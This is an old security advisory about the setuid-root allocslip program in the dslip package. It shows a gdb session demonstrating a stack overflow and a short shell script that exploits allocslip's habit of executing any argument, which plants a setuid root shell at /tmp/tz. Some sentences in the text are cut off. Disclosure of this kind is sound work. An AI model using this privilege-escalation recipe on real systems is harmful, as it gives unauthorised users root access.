allocslip (dslip)




    CyberPsychotic  found  following.   allocslip  is  part  of  dslip
    package and it  has overflow in  it, (since it's  setuid it should
    bring  a  rootshell  with  careful  exploit).   Here's  how it was

       pakage Dslip, version 2.03

        gdb allocslip

        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        There is absolutely no warranty for GDB; type "show warranty" for details.
        GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
        Inc... (no debugging symbols found)...
        (gdb) run b_s `perl -e ' printf "A" x 300'` [usual GDB mesages]
        not found
        Program received signal SIGSEGV, Segmentation fault.
         0x41414141 in ?? ()

    Info registers shows:

        ebp 0x41414141 0x41414141
        esi 0x40001fb0 1073749936
        edi 0x80487f8 134514680
        eip 0x41414141 0x41414141

    Obviously stack is smashed.   David Kopstain added following.   In
    the README file for the dslip package, it clearly states:

        Those people  who are  allowed to  turn on  and off SLIP lines
        should be  put in  the slip  group.   NOBODY except  user slip
        should be allowed  in the slipown  group since it  effectively
        allows root access (since  the dialin/dialout scripts must  be
        run as  root).   The package  advises to  install the  program
        'allocslip' like so:

        -rwsr-x---   1 root     slipown      9220 Aug  4 11:15 allocslip*

    If you follow the instructions,  then only users in group  slipown
    can run this program and you're only at _their_ mercy.  But if you
    allow anyone to run this  program on your machine, and  its setuid
    root like advised, then something as easy as this will  compromise

        cat > /tmp/sg << EOF
        cp /bin/sh /tmp/tz
        chown root /tmp/tz
        chmod 4755 /tmp/tz
        chmod +x /tmp/sg
        allocslip /tmp/sg

    allocslip simply follows any command you give it as arg 1. So take
    the above  shell script,  run it,  then look  for your  handy root
    shell at /tmp/tz.  The buffer overflow previously mentioned is  of
    no real  concern then  since we  can already  execute whatever  we
    want.  And the reason some people can't make this program do  what
    exactly  what  they  want,  (ie  call  system_script() so they can
    execute whatever they  want), is because  they must have  compiled
    in the slip option in the networking options of the kernel.


    Read the manual.  Don't be a dumbshit and install software without
    reading exactly what you're doing.